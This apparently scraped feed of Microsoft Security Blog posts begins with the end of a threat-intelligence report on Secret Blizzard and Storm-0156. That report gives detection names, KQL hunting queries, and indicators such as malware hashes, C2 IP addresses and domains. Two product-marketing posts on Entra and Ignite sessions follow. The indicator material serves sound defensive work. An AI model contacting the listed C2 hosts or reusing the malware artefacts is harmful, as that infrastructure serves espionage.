- Turn on PUA protection in block mode in Microsoft Defender Antivirus
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving threat actor tools and techniques
- Turn on Microsoft Defender Antivirus real-time protection
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. Implement PowerShell execution policies to control conditions under which PowerShell can load configuration files and run scripts
- Turn on and monitor PowerShell module and script block logging
- Implement PowerShell execution policies to control conditions under which PowerShell can load configuration files and run scripts.
- Turn on and monitor PowerShell module and script block logging.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
- Backdoor:Win64/Wainscot
- Backdoor:MSIL/CrimsonRat.A
- Backdoor:MSIL/CrimsonRat.B
- TrojanSpy:MSIL/CrimsonRat.A
- TrojanDownloader:Win64/TwoDash
- Trojan:MSIL/ReverseRAT
- Trojan:Win32/TinStrut.A
- Trojan:Win64/TinyTurla.A
- Trojan:Win64/TinyTurla.B
- Trojan:Win32/MiniPocket.A
- TrojanDownloader:Win64/TwoDash.A
- Trojan:Win64/TwoDash.B
- Trojan:Win64/PostGallery.A
- Trojan:Win32/Statuezy.B
- Trojan:Win32/TinyTurla
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
- Secret Blizzard Actor activity detected
The following alerts might also indicate threat activity related to this threat. Note, however, these alerts also can be triggered by unrelated threat activity.
- An executable file loaded an unexpected DLL file
- Process loaded suspicious .NET assembly
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence to get more information about this threat actor.
Microsoft Defender Threat Intelligence
Hunting queriesMicrosoft Defender XDR
The following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential PowerShell-related indicators for more than a week, go to the Advanced hunting page > Query tab, select the calendar dropdown menu to update your query to hunt for the Last 30 days.
Storm-0156 compromise-associated malware
Surface events that may have involved Storm-0156 compromise-associated malware.
let fileHashes = dynamic(["e298b83891b192b8a2782e638e7f5601acf13bab2f619215ac68a0b61230a273", "08803510089c8832df3f6db57aded7bfd2d91745e7dd44985d4c9cb9bd5fd1d2", "aba8b59281faa8c1c43a4ca7af075edd3e3516d3cef058a1f43b093177b8f83c", "7c4ef30bd1b5cb690d2603e33264768e3b42752660c79979a5db80816dfb2ad2", "dbbf8108fd14478ae05d3a3a6aabc242bff6af6eb1e93cbead4f5a23c3587ced", "7c7fad6b9ecb1e770693a6c62e0cc4183f602b892823f4a451799376be915912", "e2d033b324450e1cb7575fedfc784e66488e342631f059988a9a2fd6e006d381", "C039ec6622393f9324cacbf8cfaba3b7a41fe6929812ce3bd5d79b0fdedc884a", "59d7ec6ec97c6b958e00a3352d38dd13876fecdb2bb13a8541ab93248edde317" ]); union ( DeviceFileEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents" ), ( DeviceEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents" ), ( DeviceImageLoadEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents" ), ( DeviceProcessEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents" ) | order by Timestamp descMicrosoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Search for file-based IOCs:
let selectedTimestamp = datetime(2024-10-17T00:00:00.0000000Z); let fileName = dynamic(["hubstck.exe","auddrv.exe","lustsorelfar.exe","duser.dll","mfmpef.exe","MpSvcS.dll","WinHttpSvc.dll","regsvr.exe"]); let FileSHA256 = dynamic(["e298b83891b192b8a2782e638e7f5601acf13bab2f619215ac68a0b61230a273","08803510089c8832df3f6db57aded7bfd2d91745e7dd44985d4c9cb9bd5fd1d2","aba8b59281faa8c1c43a4ca7af075edd3e3516d3cef058a1f43b093177b8f83c","7c4ef30bd1b5cb690d2603e33264768e3b42752660c79979a5db80816dfb2ad2","dbbf8108fd14478ae05d3a3a6aabc242bff6af6eb1e93cbead4f5a23c3587ced","7c7fad6b9ecb1e770693a6c62e0cc4183f602b892823f4a451799376be915912","e2d033b324450e1cb7575fedfc784e66488e342631f059988a9a2fd6e006d381","C039ec6622393f9324cacbf8cfaba3b7a41fe6929812ce3bd5d79b0fdedc884a","59d7ec6ec97c6b958e00a3352d38dd13876fecdb2bb13a8541ab93248edde317"]); search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator) TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from October 17th runs the search for last 90 days, change the selectedTimestamp or 90d accordingly. and (FileName in (fileName) or OldFileName in (fileName) or ProfileName in (fileName) or InitiatingProcessFileName in (fileName) or InitiatingProcessParentFileName in (fileName) or InitiatingProcessVersionInfoInternalFileName in (fileName) or InitiatingProcessVersionInfoOriginalFileName in (fileName) or PreviousFileName in (fileName) or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or DestinationFileName in (fileName) or SourceFileName in (fileName) or ServiceFileName in (fileName) or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))Search for network IOCs:
let selectedTimestamp = datetime(2024-10-17T00:00:00.0000000Z); let ip = dynamic(["94.177.198.94","162.213.195.129","46.249.58.201","95.111.229.253","146.70.158.90","143.198.73.108","161.35.192.207","91.234.33.48","154.53.42.194","38.242.207.36", "167.86.118.69","164.68.108.153","144.91.72.17","130.185.119.198 ","176.57.184.97","173.212.252.2","209.126.11.251","45.14.194.253","37.60.236.186","5.189.183.63","109.123.244.46"]); let url = dynamic(["connectotels.net","hostelhotels.net",”ur253.duckdns.org”]); search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceInfo,DeviceNetworkEvents,DeviceNetworkInfo,DnsEvents,SecurityEvent,VMConnection,WindowsFirewall) TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from October 17th runs the search for last 90 days, change the above selectedTimestamp or 90d accordingly. and (RemoteIP in (ip) or DestinationIP in (ip) or DeviceCustomIPv6Address1 in (ip) or DeviceCustomIPv6Address2 in (ip) or DeviceCustomIPv6Address3 in (ip) or DeviceCustomIPv6Address4 in (ip) or MaliciousIP in (ip) or SourceIP in (ip) or PublicIP in (ip) or LocalIPType in (ip) or RemoteIPType in (ip) or IPAddresses in (ip) or IPv4Dhcp in (ip) or IPv6Dhcp in (ip) or IpAddress in (ip) or NASIPv4Address in (ip) or NASIPv6Address in (ip) or RemoteIpAddress in (ip) or RemoteUrl in (url)) Indicators of compromiseStorm-0156 compromise-associated malware
IndicatorTypeAssociationLast seene298b83891b192b8a2782e638e7f5601acf13bab2f619215ac68a0b61230a273Wainscot SHA-256 (hubstck.exe)Storm-0156 08803510089c8832df3f6db57aded7bfd2d91745e7dd44985d4c9cb9bd5fd1d2Wainscot SHA-256 (auddrv.exe)Storm-0156 aba8b59281faa8c1c43a4ca7af075edd3e3516d3cef058a1f43b093177b8f83cCrimsonRAT SHA-256 (lustsorelfar.exe)Storm-0156 7c4ef30bd1b5cb690d2603e33264768e3b42752660c79979a5db80816dfb2ad2Minipocket SHA-256 (duser.dll)Secret Blizzard dbbf8108fd14478ae05d3a3a6aabc242bff6af6eb1e93cbead4f5a23c3587cedTwoDash backdoor SHA-256 (mfmpef.exe)Secret Blizzard 7c7fad6b9ecb1e770693a6c62e0cc4183f602b892823f4a451799376be915912TwoDash backdoor SHA-256 (duser.dll)Secret Blizzard e2d033b324450e1cb7575fedfc784e66488e342631f059988a9a2fd6e006d381TinyTurla variant SHA-256 (MpSvcS.dl)Secret Blizzard C039ec6622393f9324cacbf8cfaba3b7a41fe6929812ce3bd5d79b0fdedc884aTinyTurla variant SHA-256 (WinHttpSvc.dll)Secret Blizzard 59d7ec6ec97c6b958e00a3352d38dd13876fecdb2bb13a8541ab93248edde317Clipboard monitor SHA-256 (regsvr.exe)Secret Blizzard connectotels[.]netTinyTurla C2 domainSecret BlizzardApril 2022hostelhotels[.]netTinyTurla C2 domainSecret BlizzardFebruary 202394.177.198[.]94TinyTurla C2 IP addressSecret BlizzardSeptember2022162.213.195[.]129TinyTurla C2 IP addressSecret BlizzardFebruary 202346.249.58[.]201TinyTurla C2 IP addressSecret BlizzardFebruary 202395.111.229[.]253TinyTurla C2 IP addressSecret BlizzardSeptember 2022146.70.158[.]90MiniPocket and TwoDash C2 IP addressSecret BlizzardMay 2024143.198.73[.]108TwoDash C2 IP addressSecret BlizzardSeptember2023161.35.192[.]207TwoDash C2 IP addressSecret BlizzardApril 202491.234.33[.]48TwoDash C2 IP addressSecret BlizzardApril 2024154.53.42[.]194ReverseRAT C2 IP addressCompromised Storm-0156 infrastructureJuly 202438.242.207[.]36ReverseRAT C2 IP addressCompromised Storm-0156 infrastructureMay 2023167.86.118[.]69ReverseRAT C2 IP addressCompromised Storm-0156 infrastructureMay 2023164.68.108[.]153ReverseRAT C2 IP addressCompromised Storm-0156 infrastructureAugust 2024144.91.72[.]17Action RAT C2 IP addressCompromised Storm-0156 infrastructureFebruary 2023130.185.119[.]198Wainscot C2 IP addressCompromised Storm-0156 infrastructureAugust 2024176.57.184[.]97Wainscot C2 IP addressCompromised Storm-0156 infrastructureSeptember 2024173.212.252[.]2Wainscot C2 IP addressCompromised Storm-0156 infrastructureAugust 2024209.126.11[.]251Wainscot C2 IP addressCompromised Storm-0156 infrastructureJune 202445.14.194[.]253CrimsonRAT C2 IP addressCompromised Storm-0156 infrastructureSeptember 202437.60.236[.]186CrimsonRAT C2 IP addressCompromised Storm-0156 infrastructureAugust 20245.189.183[.]63CrimsonRAT C2 IP addressCompromised Storm-0156 infrastructureAugust 2024109.123.244[.]46C2 Server hosting exfiltrated target dataCompromised Storm-0156 infrastructureAugust 2024 References- https://attack.mitre.org/groups/G1008/
- https://attack.mitre.org/groups/G0134/
- https://blog.lumen.com/snowblind-the-invisible-hand-of-secret-blizzard/
- https://securelist.com/the-epic-turla-operation/65545/
- https://www.darkreading.com/endpoint-security/upgraded-kazuar-backdoor-offers-stealthy-power
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a
- https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet
- https://attack.mitre.org/groups/G0010/
- https://symantec-enterprise-blogs.security.com/threat-intelligence/waterbug-espionage-governments
- https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021 ver 4 – nsa.gov.pdf
- https://attack.mitre.org/software/S1074/
- https://attack.mitre.org/software/S1075/
- https://attack.mitre.org/software/S1076/
- https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
- https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/
- https://www.welivesecurity.com/2018/01/09/turlas-backdoor-laced-flash-player-installer/
- https://blog.talosintelligence.com/tinyturla/
- https://www.sentinelone.com/labs/transparent-tribe-apt36-pakistan-aligned-threat-actor-expands-interest-in-indian-education-sector/
- https://www.trendmicro.com/en_dk/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html
- https://pentestlab.blog/2020/03/04/persistence-dll-hijacking/
- https://attack.mitre.org/software/S0668/
- https://blog.talosintelligence.com/tinyturla/#:~:text=Cisco%20Secure%20Malware%20Analytics%20(Threat%20Grid)
- https://www.darkreading.com/cyberattacks-data-breaches/russian-hackers-using-iranian-apt-s-infrastructure-in-widespread-attacks
- https://www.securityweek.com/russian-turla-cyberspies-leveraged-other-hackers-usb-delivered-malware/
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage appeared first on Microsoft Security Blog.
Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024
Identity and network access is the foundation of modern cybersecurity, with 66% of attacks involving compromised identities.¹ Equipping identity professionals to secure access to everything has never been so critical. The annual Gartner Identity & Access Management Summit, held December 9 to 11, 2024, in Grapevine, Texas, is a key identity and access management (IAM) conference that brings together identity and security experts and helps them navigate the implementation and operation of a scalable IAM infrastructure to protect their organizations.
Microsoft EntraWith a single place to secure identities and access, protecting your digital everything has never been easier.
Learn moreMicrosoft Secure Future Initiative
Get the latest updateAlongside our commitment to put security above all else through the Secure Future Initiative (SFI), Microsoft Security is committed to investing in secure identity and network access innovation. At Gartner IAM Summit, Microsoft Security will showcase the Microsoft Entra Suite—a complete Zero Trust employee access solution. Keep reading for how to connect with us in Grapevine.
AI for identity and access managementEnsuring that organizations of all sizes and industries can give the right individuals right-sized access to the right resources at the right time has been a top priority for Microsoft for years. Companies looking into IAM solutions often face challenges related to decentralized data, provisioning secure user access, and poor IAM interoperability. Microsoft Entra addresses each of these concerns directly and is designed to help organizations secure and manage digital identities across cloud-native and hybrid environments. It provides secure access for any identity, from anywhere, to any app, AI, or resource.
Last month at Microsoft Ignite we announced new capabilities—now in preview—for Microsoft Security Copilot, which is now embedded in Microsoft Entra. You can now access all identity skills previously made generally available for the Security Copilot standalone experience in April 2024, along with new identity capabilities for admins and security analysts, directly within the Microsoft Entra admin center.
Results of our recent Security Copilot IT Admin Efficiency Study are already showing promising impact:
- Copilot users showed a 46.11% reduction in completion times for sign-in troubleshooting tasks.
- Users were 46.8% more accurate across sign-in troubleshooting-related tasks when using Copilot.
- And, most notably, 95% of users agreed that Copilot helped improve the quality of their work, and 96.7% said they would want to use Copilot for these tasks in the future.
Read more on the new skills and how to implement them.
How to engage with Microsoft Security at Gartner IAM SummitWe’re excited to show off the new capabilities of Copilot in Microsoft Entra, as well as other Entra capabilities, throughout our presence at Gartner IAM Summit. Here are a few ways to join us:
- See live demos: We welcome you to visit booth #403, where you can see live demonstrations of Microsoft Security Copilot and the Microsoft Entra Suite. You’ll also hear from our experts on the best practices and product use cases.
- Join our session on AI and identity: On December 9, 2024, from 11:45 AM CT to 12:15 PM CT, Microsoft will be conducting the session Transforming the future of IAM: Bridging Identity, Network Security and AI, presented by Kaitlin Murphy, Senior Director of Product Marketing, Identity Innovations. This session explores how the current state of access management is rapidly evolving, uncovers the unification of IAM and network security, and asks whether traditional IAM solutions do enough to meet the exponential growth of identities and apps across today’s dynamic, AI-powered cyberthreat landscape. Join us to find out if identity remains the center of security.
- Join our session on improving your onboarding: The following day, December 10, 2024, from 12:45 PM CT to 1:15 PM CT, Manmeet Bawa, Director of Product Management, Identity and Network Access, will present the sponsored lunch session Strengthen your workforce security and streamline effortless onboarding with Microsoft Entra Suite. This session lets you experience how Microsoft Entra delivers seamless workforce access security from day one. You’ll be able to watch as a Microsoft expert demonstrates the process of setting up new access package policies with Microsoft Entra ID Governance and creates top-tier identity verification and entitlement management using Face Check with Microsoft Entra Verified ID.
- Book a meeting: One of the most hands-on opportunities to engage at this event is joining us for a one-on-one meeting with Microsoft Security leaders and experts. To book a meeting, click here or visit us at at booth #403, covering the important and emerging identity and network access topics you deem most important. So, whether you’re most interested in the ways Microsoft Security Copilot adds to a secure IAM landscape, have questions regarding advanced identity topics, want to learn more about the unification of identity and network security, or would like an expert’s perspective on what Microsoft Entra can do for you, we’ll be there to talk you through it.
Now that you’re interested in attending the Gartner Identity & Access Management Summit 2024, if you’ve yet to secure tickets for your team, Microsoft can now offer you a $375 discount on event registration. Simply use code IAM19EDC when registering. Once you are registered, make sure to schedule your one-on-one meeting with our experts.
For those unable to attend who are looking for another way to discover the latest innovations in the IAM space and see how technologies are evolving, the Microsoft page on identity and network access is a great place to start.
Are you a regular user of Microsoft Entra ID? Review your experience on Gartner Peer Insights™ and get a $25 gift card.
Learn moreLearn more about the Microsoft Entra Suite.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
¹ State of Multicloud Risk Report, Microsoft. 2024.
The post Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024 appeared first on Microsoft Security Blog.
Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition
AI transformation starts with security. This was a major theme across the majority of the big news and reveals from Microsoft Security at Microsoft Ignite 2024. Security discussions also drew big crowds throughout the event, with security-related sessions scoring in the top 10 most-attended sessions on each day of the conference. In this article, we’ll share information on how you can get live answers to your questions about our latest security innovations and announcements from engineering and product teams. And if you missed it, here are just a few of the highlights from Ignite.
Tech Community Live: Microsoft SecurityAsk us anything about simplified, end-to-end, AI-driven protection with Microsoft Security!
Sign up now AI transformation requires security transformationBefore Microsoft Ignite officially began, hundreds of security and IT professionals gathered early for the Microsoft Ignite Security Forum to hear from Microsoft Security product leaders about Microsoft’s threat intelligence and AI research, among other security strategy topics. Then on Day 1 of Microsoft Ignite, the event kicked off with an exciting keynote speech that dove into how Microsoft is creating powerful new opportunities across its platforms as the era of AI takes shape—including in security. Microsoft Chairman and Chief Executive Officer (CEO) Satya Nadella kicked off the keynote’s discussion of security innovations by highlighting changes coming to Microsoft Purview.
“In the age of AI, data governance takes on an even more critical, central, important role,” said Nadella.
The keynote ended with Executive Vice President of Microsoft Security Charlie Bell, joined by Corporate Vice President, Microsoft Security Business, Vasu Jakkal. The two gave an overview of today’s security landscape and the innovations Microsoft Security is driving to help defenders rise to its challenges.
What is Generative aI?
Learn more“Security is job number one in the age of AI,” said Jakkal, highlighting that one of the most critical use cases of trustworthy AI is supporting security professionals. Microsoft itself recently put generative AI in the hands of its security teams with Microsoft Security Copilot and used generative AI developed in its research labs to identify potentially-exposed credentials that could have been used by cyberthreat actors. These security leaders also shared how securing and governing AI and the data it uses can help empower AI innovation and to help unify and simplify security for all.
Among the most exciting news was the announcement that Microsoft Security Exposure Management is now generally available. This new innovative solution provides security professionals with a graph-based approach to proactive threat protection. It dynamically creates a comprehensive view of the entire attack surface, allowing the exploration of assets and their changing relationships with login credentials, permissions, and other ways users connect to company data. This enables more thorough assessments of your organization’s security posture and exposure.
Explore Microsoft Security Exposure ManagementSecure Future Initiative
Read the latest updateMicrosoft also shared the latest report on the Secure Future Initiative (SFI), prioritizing security above all else, establishing leading governance and frameworks to manage threats at scale, and better deterring even the most powerful and well-funded cyberthreat actors in the world. In part, this will be done through minimizing excessive permissions, reducing credential-related risks, and establishing and maintaining comprehensive asset inventories.
Learn more about the Secure Future InitiativeThere was also a lot of interest around Microsoft Security Copilot. Nearly 70% of the Fortune 500 already use Microsoft 365 Copilot.¹ The Copilot stack has already begun empowering users to build even more ambitious products, and this trend is likely to continue with the announcement of Azure AI Foundry, which gives organizations the power to design, customize, and manage next-generation AI apps and agents at scale. Microsoft Security Copilot is now embedded in the Microsoft Entra admin center, delivering new identity management capabilities. The solution will also be adding new capabilities across Microsoft Intune, Microsoft Purview, Azure Logic Apps, and across the Microsoft Partner Ecosystem.
Discover more with Microsoft Security CopilotAnd during the Microsoft Security General Session, entitled Security Innovation to Strengthen Cyber Defense in the Age of AI, speakers Joy Chik, Rob Lefferts, Michael Wallent, Herain Oberoi, and Vasu Jakkal discussed how AI can be used to enhance cyber defense mechanisms by predicting, detecting, and responding to cyberthreats more efficiently. AI-driven cyberthreat detection, for instance, is already helping to identify patterns and anomalies in network traffic. AI can also enhance automated incident responses to further minimize negative effects on organizations. The session also explored potential future trends in AI and its evolving role in cyber defense strategies.
Join us for the Microsoft Security Ask Microsoft Anything (AMA) seriesNow that the news from Ignite is out, Microsoft Security is keeping all the wonderful conversations started throughout the week going with the Tech Community Live: Microsoft Security edition series of AMA sessions. These sessions will be held on Tuesday, December 3, from 7:00 AM to 11:30 AM PT, and will feature Microsoft subject matter experts—all of whom will be prepared to share in-depth content in their areas of expertise and to answer your technical questions. Each session will be streamed for viewers across LinkedIn, X, and YouTube, but if you have a burning question you want the experts to answer, make sure to add the sessions to your calendar to join the discussions live on Tech Community.
Here’s a quick summary of each AMA session, including when it will be taking place and what will be covered:
7:00 to 8:00 AM PT: Security CopilotWe’ll be jumping into Microsoft Security Copilot bright and early. Find out how to respond to cyberthreats quickly and assess risk exposure in minutes. The product team will also be sharing how to help you configure Security Copilot and process signals at machine speed, while saving time for any questions you need answers to.
Take a look at these Ignite sessions that might interest you about Security Copilot:
- Optimize with Security Copilot: Real-world insights and expert advice
- Transform your security with GenAI innovations in Security Copilot
- One goal, many roles: Microsoft Security Copilot use cases for all
- Security Partner Growth: Harness the Power of AI in Security Copilot
Next up, you can join our panel of experts ready to field questions about the Microsoft Entra Suite. Whether you want to secure access for your employees and extend Conditional Access across your cloud-native and on-premises apps or want to retire old VPNs and automate your organization’s identity lifecycle workflows, our panel will be ready to share insights, best practices, and how Microsoft identity and network access solutions can help.
Explore Ignite sessions about Entra Suite:
- Security Innovation to Strengthen Cyber Defense in the Age of AI
- Secure access for any identity to any resource with Microsoft Entra
- Secure access for your workforce with the new Microsoft Entra Suite
- Security Partner Growth: The Power of Identity with Entra Suite
By mid-morning, we’ll have a panel of experts diving into the latest Microsoft Defender for Cloud recommendations and answering your feature-specific questions.
Ignite sessions worth checking out for Defender for Cloud:
- Mitigate threats using Microsoft Defender for Cloud
- Secure Azure services and workloads with Microsoft Defender for Cloud
- Future-proofing AI-driven migrations with Microsoft Defender for Cloud
Join us to explore Microsoft’s Security Service Edge (SSE) partner ecosystem, where we collaborate with top industry leaders to deliver integrated, identity-centric solutions for enhanced security and seamless connectivity. Ask Microsoft Anything about Global Secure Access, learn how our partnerships are simplifying security and networking, and gain insights related to supporting your hybrid workforce effectively.
Check out these relevant Ignite sessions and blogs covering SSE:
- Microsoft partners for new SASE ecosystem | Microsoft Community Hub
- Microsoft and Netskope: Unified, identity-centric security | Microsoft Community Hub
- Accelerate your Zero Trust Journey: Unify Identity and Network Access
Microsoft Security Exposure Management can help experts responsible for maintaining a strong security posture at their organization gain a unified view of their cyberattack surface, investigate cyberattack paths, manage exposure, and better safeguard critical assets. Learn how to get ahead of cyberattackers in this AMA.
Must-see Ignite sessions featuring Exposure Management:
- Microsoft Ignite Keynote
- Security Innovation to Strengthen Cyber Defense in the Age of AI
- Proactive security with continuous exposure management
AI adoption is a popular and important topic this year, so join us to prepare your infrastructure to securely adopt AI, to learn the best ways to protect your AI stack and sensitive data, or if you have your own important AI security questions. Microsoft experts on this panel will help you confidently embrace the age of AI with industry-leading cybersecurity and compliance solutions.
Ignite sessions you may have missed highlighting Security for AI:
- Security Innovation to Strengthen Cyber Defense in the Age of AI
- Secure and govern custom AI built on Azure AI and Copilot Studio
- Secure and govern data in Microsoft 365 Copilot and beyond
- Scott and Mark learn responsible AI
Whether you were at Ignite or not, this live, interactive Tech Community event is one not to miss. And remember that you can also listen in as part of our cross-platform audience or watch any of the sessions at a later time, on-demand.
Sign up for Tech Community Live: Microsoft Security editionAnd if you’re curious to learn more about the security news and solutions we shared at Ignite, check out the security session recordings.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
¹Ignite 2024: Why nearly 70% of the Fortune 500 now use Microsoft 365 Copilot, Nov 19, 2024
The post Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition appeared first on Microsoft Security Blog.